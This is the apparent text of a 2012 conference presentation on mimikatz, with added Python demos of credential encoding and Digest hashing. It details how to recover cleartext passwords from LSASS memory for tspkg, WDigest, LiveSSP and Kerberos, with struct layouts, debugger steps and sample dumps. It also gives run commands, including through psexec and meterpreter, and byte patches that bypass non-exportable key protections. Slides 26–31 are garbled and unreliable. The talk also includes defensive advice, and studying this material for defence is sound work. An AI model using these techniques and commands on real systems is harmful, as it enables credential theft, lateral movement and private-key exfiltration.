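    tag, seq, end = _read_tlv(blob, 0)
    if tag != 0x30 or end != len(blob):
        raise ValueError("not a single DER SEQUENCE")
    out = {}
    pos = 0
    while pos < len(seq):
        tag, inner, pos = _read_tlv(seq, pos)
        if tag & 0xE0 != 0xA0:                            # must be constructed, context-specific
            raise ValueError(f"unexpected tag 0x{tag:02x}")
        otag, octets, _ = _read_tlv(inner, 0)
        if otag != 0x04:
            raise ValueError("expected OCTET STRING inside context tag")
        out[FIELD_NAMES[tag & 0x1F]] = octets.decode("utf-16-le")
    return out


if __name__ == "__main__":
    # Constructed sample values for the demonstration.
    blob = encode_ts_password_creds("vm-w8-rp-x", "Gentil Kiwi", "waza1234")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
```

The decoder refuses trailing bytes after the SEQUENCE and tags it does not expect, which is the kind of strictness a server-side parser of delegated credentials should have; the encoder's long-form length handling matters because UTF-16LE doubles the byte count of every field.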
mimikatz :: sekurlsa :: tspkg - symbols & theory (slide 13)
Let's explore some symbols
– sounds cool… (thanks Microsoft)
Let's imagine a scenario:
– Enumerate all sessions to obtain
  • Username
  • Domain
  • LUID
– Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  • TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  • TS_PRIMARY_CREDENTIAL with clear text credentials…
    kd> x tspkg!*clear*
    75016d1c          tspkg!TSObtainClearCreds = <no type information>
    kd> x tspkg!*password*
    75011b68          tspkg!TSDuplicatePassword = <no type information>
    75011cd4          tspkg!TSHidePassword = <no type information>
    750195ee          tspkg!TSRevealPassword = <no type information>
    75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
    kd> x tspkg!*locate*
    7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg - workflow (slide 14)
Workflow:
    LsaEnumerateLogonSessions
      -> for each LUID
      -> tspkg!TSGlobalCredTable, looked up with RtlLookupElementGenericTableAvl
      -> KIWI_TS_CREDENTIAL
      -> KIWI_TS_PRIMARY_CREDENTIAL
      -> LsaUnprotectMemory
      -> password in clear

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg - demo time (slide 15)
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest (slide 16)
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest - what is it? (slide 17)
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]”
Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios:
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP”
Microsoft: http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool!
– No password over the network, just hashes
– No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest - what is it? (slide 18)
We speak about hashes, but what hashes?
    H   = MD5(HA1:nonce:[…]:HA2)
    HA1 = MD5(username:realm:password)
    HA2 = MD5(method:digestURI[…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.
The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from server)
– Password
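An added worked example of the computation on this slide (not code from the slides or from mimikatz): the RFC 2617 Digest response, with the client side written as the role WDigest plays and the server side as a verifier that holds only HA1. The RFC 2617 section 3.5 test vector (user "Mufasa", realm "testrealm@host.com", password "Circle Of Life") is used so the result can be checked; the two extra realms in ha1_per_realm() are constructed for the example.

```python
import hashlib
import hmac


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm is chosen by the server."""
    return md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI), the qop=auth form."""
    return md5_hex(f"{method}:{digest_uri}")


def digest_response(ha1_value: str, nonce: str, nc: str, cnonce: str, qop: str, ha2_value: str) -> str:
    """RFC 2617: response = MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    return md5_hex(f"{ha1_value}:{nonce}:{nc}:{cnonce}:{qop}:{ha2_value}")


def client_answer(username: str, password: str, challenge: dict, method: str, uri: str,
                  cnonce: str, nc: str = "00000001") -> str:
    """What the client (WDigest's role) computes. It needs the password
    because the realm only arrives with the server's challenge."""
    realm, nonce, qop = challenge["realm"], challenge["nonce"], challenge["qop"]
    return digest_response(ha1(username, realm, password), nonce, nc, cnonce, qop, ha2(method, uri))


def server_verify(stored_ha1: str, challenge: dict, method: str, uri: str,
                  cnonce: str, nc: str, response: str) -> bool:
    """The server needs only HA1 for its own realm, never the password."""
    expected = digest_response(stored_ha1, challenge["nonce"], nc, cnonce, challenge["qop"], ha2(method, uri))
    return hmac.compare_digest(expected, response)


def ha1_per_realm(username: str, password: str, realms: list) -> dict:
    """One HA1 per realm: caching a single HA1 at logon cannot serve every server."""
    return {r: ha1(username, r, password) for r in realms}


def rfc2617_example() -> str:
    """The RFC 2617 section 3.5 vector; expected response 6629fae49393a05397450978507c4ef1."""
    challenge = {"realm": "testrealm@host.com", "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093", "qop": "auth"}
    return client_answer("Mufasa", "Circle Of Life", challenge, "GET", "/dir/index.html", "0a4f113b")


if __name__ == "__main__":
    print("response:", rfc2617_example())
    # Constructed realms: two servers, two different HA1 values, one password.
    print(ha1_per_realm("gentilkiwi", "waza1234", ["intranet.example", "mail.example"]))
```

The asymmetry is the whole security story of the slide: a server can store HA1 instead of the password, but a client that must answer challenges from arbitrary realms after logon has no such option, which is why WDigest keeps the password reachable in LSASS.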
mimikatz :: sekurlsa :: wdigest - theory (slide 19)
This time we know:
– that WDigest keeps the password in memory « by protocol », for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the double linked list wdigest!l_LogSessList
    .text:7409D151  _DigestCalcHA1@8          call    dword ptr [eax+0B4h]
    .text:74096C69  _SpAcceptCredentials@16   call    dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest - workflow (slide 20)
Workflow:
    LsaEnumerateLogonSessions
      -> for each LUID
      -> wdigest!l_LogSessList: search the linked list for the LUID
      -> KIWI_WDIGEST_LIST_ENTRY
      -> LsaUnprotectMemory
      -> password in clear

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        /* [...] */
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        /* [...] */
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest - demo time (slide 21)
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp (slide 22)
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp - how? (slide 23)
Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~… let's be more brutal this time: make a WinDBG trap!
    0: kd> !process 0 0 lsass.exe
    PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe

    0: kd> .process /i 83569040
    You need to continue execution (press 'g' <enter>) for the context
    to be switched. When the debugger breaks in again, you will be in
    the new process context.
    0: kd> g
    Break instruction exception - code 80000003 (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
    0: kd> g
mimikatz :: sekurlsa :: livessp - how? (slide 24)
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Call stacks caught by the LsaProtectMemory trap (kc 5), top frame first:
    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2
        -> Our LiveSSP provider!

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials
        -> Yeah! Pass-the-hash capability with a Live account too…

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
        -> Live users can logon through RDP via SSO

    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 (74781536)
    [...]
      livessp!LsaApLogonUserEx2+0x560 (74781a96):
        call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp - workflow (slide 25)
Workflow:
    LsaEnumerateLogonSessions
      -> for each LUID
      -> livessp!LiveGlobalLogonSessionList: search the linked list for the LUID
      -> KIWI_LIVESSP_LIST_ENTRY
      -> KIWI_LIVESSP_PRIMARY_CREDENTIAL
      -> LsaUnprotectMemory
      -> password in clear

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa (slide 26)
Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me, yes!
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way (they have to be used).
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too, and “imports” the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
Diagram: LsaUnprotectMemory
mimikatz :: sekurlsa :: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Diagram: in the lsass process, lsasrv holds lsasrv!g_cbRandomKey (DWORD, 256), lsasrv!g_pRandomKey (BYTE[g_cbRandomKey]), lsasrv!g_pDESXKey (BYTE[144]) and lsasrv!g_Feedback (BYTE[8]); mimikatz loads its own lsasrv and copies these keys from lsass…
mimikatz :: sekurlsa :: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Diagram: in the lsass process, lsasrv holds lsasrv!InitializationVector (BYTE[16]), lsasrv!h3DesKey and lsasrv!hAesKey (PKIWI_BCRYPT_KEY); mimikatz copies them from lsass…

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages
Package          Symbols                                                    Type
tspkg            tspkg!TSGlobalCredTable                                    RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                                      LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                         LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                              LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                       RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount     LIST_ENTRY / ULONG

Protection Keys
Key     NT 5 Symbols                                   NT 6 Symbols
(IV)    –                                              lsasrv!InitializationVector
RC4     lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey     –
DESx    lsasrv!g_pDESXKey / lsasrv!g_Feedback          –
3DES    –                                              lsasrv!h3DesKey
AES     –                                              lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :     Utilisateur  : Gentil Kiwi
                     Domaine      : vm-w8-rp-x
                     Hash LM      : d0e9aee149655a6075e4540af1f22d3b
                     Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :   Utilisateur  : Gentil Kiwi
                     Domaine      : vm-w8-rp-x
                     Mot de passe : waza1234
        wdigest :    Utilisateur  : Gentil Kiwi
                     Domaine      : vm-w8-rp-x
                     Mot de passe : waza1234
        tspkg :      Utilisateur  : Gentil Kiwi
                     Domaine      : vm-w8-rp-x
                     Mot de passe : waza1234
        livessp :    n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics:
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless :))
– For privileged accounts: network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges: even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth:
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys :))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are “not” exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format (it’s cool, OpenSSL can deal with it too)
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
Module: mod_mimikatz_crypto
mimikatz :: crypto :: how it’s protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or the password of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a “session”
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
  (callouts on the slide: “Constraint for most users”, “Unavailable for computer keys”)
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware.”
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your-apps-here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it’s exported (“PLAYSKOOL” level)
Diagram: Process → CryptoAPI and RSA CSP → Load Private Key (DPAPI decode) → Ask to export Key → Exportable? yes: Exported Key / no: NTE_BAD_KEY_STATE
mimikatz :: crypto :: patch :: capi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.
(callout on the slide: Exportable?)

mimikatz :: crypto :: patch :: capi :: because I own my process
So what? A module in my own process returns that I can’t do something? CryptoAPI is in my memory space, let’s patch it!
I wrote “4” bytes in my memory space:
.text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB  90                   nop
.text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749  90                   nop
.text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patch :: capi :: demo time
Import, export, import as not exportable… export
mimikatz :: crypto :: patch :: capi :: limitations
Because:
– I’m lazy
– In the majority of cases I’ve seen RSA keys in real life use
  • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works
“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.”
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”
This time, key operations are not made in the “user” process context
Processes use RPC to call “Key isolation service” (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it’s not perfect…
mimikatz :: crypto :: cng :: how it’s exported (“PLAYSKOOL” level)
Diagram: Process → CNG → RPC → KeyIso Service (LSASS process; on NT6 a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP) → Load Private Key (DPAPI decode) → Ask to export Key → Exportable? yes: Exported Key / no: NTE_NOT_SUPPORTED
mimikatz :: crypto :: patch :: cng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) → ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
(callout on the slide: Exportable?)

mimikatz :: crypto :: patch :: cng :: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote “1” byte in LSASS memory space…
.text:6C815210  75 1C    jnz  short continue_key_export
.text:6C815210  EB 1C    jmp  short continue_key_export
mimikatz :: crypto :: patch :: cng :: demo time
Import, export, import as not exportable… export again
mimikatz :: crypto :: patch :: cng :: limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz :: crypto :: patch :: cng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don’t check the export flag before asking for the export can work too
– Yeah, like the good old certutil

Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil : -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password:
– PFX files are protected by this password: mimikatz
Keys:
– When you import a certificate multiple times (exportable or not), Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn’t it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts/computer
– no admin, no admin, no admin…
Basics:
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify the vendors’ implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver:
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilter actions
– List Notifications (process, thread, image, registry)
– List Object hooks and procedures
– …
…
mimikatz :: that’s all folks!
Thanks to / Merci à:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don’t be shy ;)
